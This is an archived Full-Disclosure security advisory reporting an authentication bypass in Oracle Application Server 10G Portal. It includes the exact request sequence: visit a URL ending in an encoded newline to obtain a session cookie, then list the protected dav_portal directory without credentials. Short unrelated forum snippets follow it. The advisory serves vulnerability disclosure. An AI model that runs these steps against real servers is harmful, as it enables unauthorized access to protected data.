[Full-disclosure] Oracle Application Server 10G ORA_DAV Basic Authentication Bypass Vulnerability




Affected Software/Device: Oracle Application Server Portal

Vulnerability: Authentication Bypass

Tested Version: 10G

Risk: Medium

Description:

Oracle Application Server Portal (OracleAS Portal) is a Web-based
application for building and deploying portals. It provides a secure,
manageable environment for accessing and interacting with enterprise
software services and information resources.

Initially /dav_portal/portal/ directory is being protected using basic
authentication. It is possible to bypass and access content of
dav_portal by adding a specially crafted cookie value in the http
request header.

Sample Request:

In order to construct a special http request first visit
"http:/site/pls/portal/%0A" url. This request adds special session id
into cookie. Subsequent connection attempts to
"http://site/dav_portal/portal/"; will reveal the contents of directory
without any authentication.

Deniz CEVIK
www.intellectpro.com.tr

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



Relevant Pages

  • Oracle Application Server 10G ORA_DAV Basic Authentication Bypass Vulnerability
    ... Affected Software/Device: Oracle Application Server Portal ... Vulnerability: Authentication Bypass ... Oracle Application Server Portal is a Web-based ...
    (Bugtraq)
  • Re: Required permissions cannot be acquired?
    ... Changing the file permissions was one of the things I tried. ... > I have forms authentication in SQL RS working like a charm. ... I am now trying to do some authentication against an Oracle ... >Any application that is using the Authenticated User privilege will not work. ...
    (microsoft.public.dotnet.security)
  • Re: NT authentication with Oracle 9i
    ... I am using Oracle 9i as a backend for ASP.net web application. ... When browser settings on A for logon for intranet are set as "automatic ... I want to know the role of NT logon credentials in initializing the ... Authentication adapter. ...
    (comp.databases.oracle.server)
  • Re: Required permissions cannot be acquired?
    ... I have forms authentication in SQL RS working like a charm. ... I am now trying to do some authentication against an Oracle ... Microsoft OLE DB Provider for Oracle ... Any application that is using the Authenticated User privilege will not work. ...
    (microsoft.public.dotnet.security)